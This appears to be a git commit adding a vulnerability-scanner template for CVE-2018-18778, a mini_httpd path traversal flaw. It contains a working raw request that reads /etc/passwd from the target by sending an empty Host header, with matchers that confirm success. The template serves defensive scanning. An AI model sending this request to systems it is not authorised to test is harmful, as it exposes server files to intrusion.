Adding CVE-2018-18778
parent
794742eb60
commit
ad8ebf7f0a
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2018-18778
|
||||
|
||||
info:
|
||||
name: mini_httpd Path Traversal
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
|
||||
tags: cve,cve2018,lfi
|
||||
requests:
|
||||
- raw:
|
||||
- |+
|
||||
GET /etc/passwd HTTP/1.1
|
||||
Host:
|
||||
Content-Length: 4
|
||||
|
||||
unsafe: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
Loading…
Reference in New Issue